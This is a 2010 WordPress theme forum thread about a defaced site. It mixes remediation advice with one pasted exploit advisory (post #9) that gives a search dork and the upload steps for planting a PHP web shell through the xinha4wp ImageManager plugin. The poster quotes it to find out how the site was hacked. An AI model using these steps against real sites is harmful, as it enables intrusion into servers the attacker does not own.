Wordpress Themes - WP Forum at BFA
There will be no more development for Atahualpa (or any other theme), and no support. Also no new registrations. I turned off the donation system. I may turn the forum to read only if it gets abused for spam. Unfortunately I have no time for the forum or the themes. Thanks a lot to the people who helped in all these years, especially Larry and of course: Paul. Take care and stay healthy -- Flynn, Atahualpa developer, Sep 2021

Wordpress Themes - WP Forum at BFA » WordPress Themes » Atahualpa 3 Wordpress theme » New Versions, & Updating »

My site has been hacked - atahualpa 3.4.6


  #1  
Old Jun 15, 2010, 08:38 AM
Mikii
 
23 posts · Jul 2009
hi.

My wordpress' website was just hacked. I strongly suspect Atahualpa, because re-downloading and re-installing it (version 3.4.6) solved the problem.

Any page of the website showed this crew signature: "uah-crew".

The "hacked" 3.4.6 version is available for reviewing. Just PM or email me and I'll send it to you.

Thanks for the attention.

Michele
  #2  
Old Jun 15, 2010, 09:16 AM
juggledad's Avatar
juggledad
 
23,765 posts · Mar 2009
OSX 10.11.5 WP 4.x Atahualpa(all) Safari, Firefox, Chrome
I would suspect it is your wordpress and/or server that was hacked.
Who is your host?
contact them and tell them you have been hacked.

What version of WordPress are you running?
use FTP and go look at the dates on all your other themes and all other wordpress files and see if there are any with a date that doesn't match the others.
Change your wordpress admin password
check all users in wordpress
cange your ftp passwotd
look to see if there are any other FTP users you don't know
change your cpanel/host password, check to see if there are any others you don't recognize
scan your wordpress database for any potential sql injections

do a google search on 'wordpress hacked' and follow the directions

This is not a fun thing to have happen or easy thing to have fixed. Hundreds of wordpress sites were hacked into a couple months ago at bluehost and it was a server security issue.

good luck recovering
__________________
"Tell me and I forget, teach me and I may remember, involve me and I learn." - Benjamin Franklin
Juggledad | Forum Moderator/Support
  #3  
Old Jun 15, 2010, 09:49 AM
Mikii
 
23 posts · Jul 2009
Dear juggledad,

All I can say is that public_html/wp-content/themes/atahualpa/index.php had been re-written. I am still investigating how. WP is 2.9.2.

The original directory has already been replaced on server, and re-installing Atahualpa solved the problem.

Thanks for your suggestions, please feel free to change the subject of this post if you feel it's not an atahualpa "hole".

Will keep you posted.
  #4  
Old Jun 15, 2010, 10:38 AM
juggledad's Avatar
juggledad
 
23,765 posts · Mar 2009
OSX 10.11.5 WP 4.x Atahualpa(all) Safari, Firefox, Chrome
You have wordpress installed in 'public_html'???? how secure is it?
who is the host?
what is the url?
__________________
"Tell me and I forget, teach me and I may remember, involve me and I learn." - Benjamin Franklin
Juggledad | Forum Moderator/Support
  #5  
Old Jun 15, 2010, 10:50 AM
Mikii
 
23 posts · Jul 2009
url is www.tendertonaveitalia.net

host is hostingplan.net / Cpanel / linux

pardon my ignorance, what is wrong with putting wordpress on your root home directory?

Tnx.
  #6  
Old Jun 15, 2010, 10:51 AM
juggledad's Avatar
juggledad
 
23,765 posts · Mar 2009
OSX 10.11.5 WP 4.x Atahualpa(all) Safari, Firefox, Chrome
when I see 'public' in a folder name, alarms go off. Now it might be quite secure, but I'd check it out. It's just me being nervous.

Have you contacted the host to see if anyone else was hacked?
__________________
"Tell me and I forget, teach me and I may remember, involve me and I learn." - Benjamin Franklin
Juggledad | Forum Moderator/Support
  #7  
Old Jun 15, 2010, 11:16 AM
Mikii
 
23 posts · Jul 2009
Quote:
Originally Posted by juggledad
when I see 'public' in a folder name, alarms go off. Now it might be quite secure, but I'd check it out. It's just me being nervous.

Have you contacted the host to see if anyone else was hacked?
I see. "public html" is just an alias to "www". It's the place where all the "web" stuff go.

Yes I did contact my host. hopefully They'll find out how the hacker got his hands on the index.php.

Thanks you for your feedbacks. Cheers!
  #8  
Old Jun 15, 2010, 12:09 PM
DannyLife's Avatar
DannyLife
 
40 posts · Nov 2009
I had a site get hacked not too long ago with exactly the same method. It wasn't anything to do with the theme, apparently they got in through a plug-in that I hadn't updated. So check and make sure they're all up to the current version.
  #9  
Old Jun 15, 2010, 12:32 PM
Mikii
 
23 posts · Jul 2009
Quote:
Originally Posted by DannyLife
I had a site get hacked not too long ago with exactly the same method. It wasn't anything to do with the theme, apparently they got in through a plug-in that I hadn't updated. So check and make sure they're all up to the current version.
yes, I found this via google. Only: I do not have ImageManager installed. Was this your plugin?

------
================================================== =============
Wordpress xinha4wp xinha_core plugins File Upload Vulnerability
================================================== =============

################################################## ##################

Author : Hackeri-AL
Contact : hackeri-al[at]live[dot]com
Greetz : LoocK3D & all Albania and Kosova Hackers
My Group : UAH-Crew = United Albania Hackers

################################################## ##################

[~] DORK: /imagemanager/demo_images/wp/ site: com ,de , org / etc...

--------------------------------------------------------------------

[~] You go to: htpp://web.com/wp-content/plugins/xinha4wp/xinha_core/plugins/ImageManager/
[~] Then we : htpp://web.com/wp-content/plugins/xinha4wp/xinha_core/plugins/ImageManager/manager.php <[ upload here shell ]
[~] Shell : htpp://web.com/wp-content/plugins/xinha4wp/xinha_core/plugins/ImageManager/demo_images/yourShell.php

################################################## ##################

[~] Video: http://www.youtube.com/watch?v=BG-OVjG8dcs

################################################## ##################

[~] Proud 2 be Albania
[~] Proud 2 be Muslim
[~] United States of Albania

################################################## ##################


# Inj3ct0r.com [2010-04-16]

------
  #10  
Old Jun 15, 2010, 12:58 PM
DannyLife's Avatar
DannyLife
 
40 posts · Nov 2009
Sorry, I never got to see the details. My host dealt with it and informed me that I needed to update the plug-ins. I wasn't using ImageManager either though.
  #11  
Old Jun 15, 2010, 01:15 PM
Mikii
 
23 posts · Jul 2009
I see. Thanks. All my plugins are updated now. Hope my host will be able to tell me what the problem was.
  #12  
Old Jun 17, 2010, 10:09 PM
Knut Sparhell
 
34 posts · Jun 2010
Fredrikstad, Norway
Quote:
Originally Posted by juggledad
when I see 'public' in a folder name, alarms go off. Now it might be quite secure, but I'd check it out. It's just me being nervous.
The public_html alias www is the standard (By Linux based Web Hosts) naming of the user folder that will serve as the root folder for the web site. Similar to public_ftp for you ftp site. It's just a name. It doesn't imply it initially has write access for everyone.

Bookmarks

Thread Tools Search this Thread
Search this Thread:

Advanced Search
Display Modes


Similar Threads
Thread Thread Starter Forum Replies Last Post
Working with Atahualpa on my site Runner Atahualpa 3 Wordpress theme 1 Apr 14, 2010 08:18 PM
Can Atahualpa be used to look like this site? brianlees Atahualpa 3 Wordpress theme 6 Oct 19, 2009 06:21 AM
My site's been hacked! paulae Installing & running WordPress 3 Sep 13, 2009 09:34 PM
hacked? rachkitty Atahualpa 3 Wordpress theme 3 May 6, 2009 12:52 PM
{Can this theme get hacked? djmom70 Atahualpa 3 Wordpress theme 7 Mar 25, 2009 07:54 PM


All times are GMT -6. The time now is 04:27 PM.


Powered by vBulletin® Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.